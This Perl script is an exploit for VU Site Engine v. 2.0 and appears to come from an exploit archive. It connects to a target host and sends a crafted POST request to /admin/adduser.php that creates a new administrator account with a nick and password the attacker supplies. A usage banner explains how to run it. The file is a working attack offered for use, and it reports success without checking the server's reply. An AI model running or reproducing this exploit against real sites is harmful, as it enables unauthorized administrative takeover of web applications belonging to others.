#!/usr/bin/perl

use IO::Socket;

# VU Site Engine v. 2.0 add new admin exploit
# Bug found GeW (http://www.security.nitro.ru)
# Exploit coded by Censored - SV
#--------------------------------------------
# Search Vulnerabilities // www.svt.nukleon.us

if (@ARGV < 3) { &usage; }

$host=$ARGV[0];
$new_admin = $ARGV[1];
$pass = $ARGV[2];

$host =~ s/(http:\/\/)//eg;

print "[~] Connect to $host\n";

$bug="/admin/adduser.php?logged_user=3&usern=$new_admin&pass=$pass&type=2&used=1";
$socket=IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Can't connect to $host\n";
print "[+] Connect, one moment\n";
print $socket "POST $bug HTTP/1.1\n"; 
print $socket "Host: $host\n";
print $socket "Accept: */*\n";

    print "[~] On $host add new admin\n";
    print "[+] nick: $new_admin\n";
    print "[+] pass: $pass\n";
    

sub usage ()
{ print q(~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 VU Site Engine v. 2.0 add new admin exploit
----------------------------------------------
E.G.  
  sv-VUSite.pl www.bla.com Hats hats
Usage:
  perl sv-VUSite.pl [host] [admin nick] [pass]

Params:
            [host] - vulnerabilities Host
      [admin nick] - new admin nick
            [pass] - pass for new admin
----------------------------------------------
Coded by Censored
Search vulnerabilities // www.svt.nukleon.us
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
exit();
}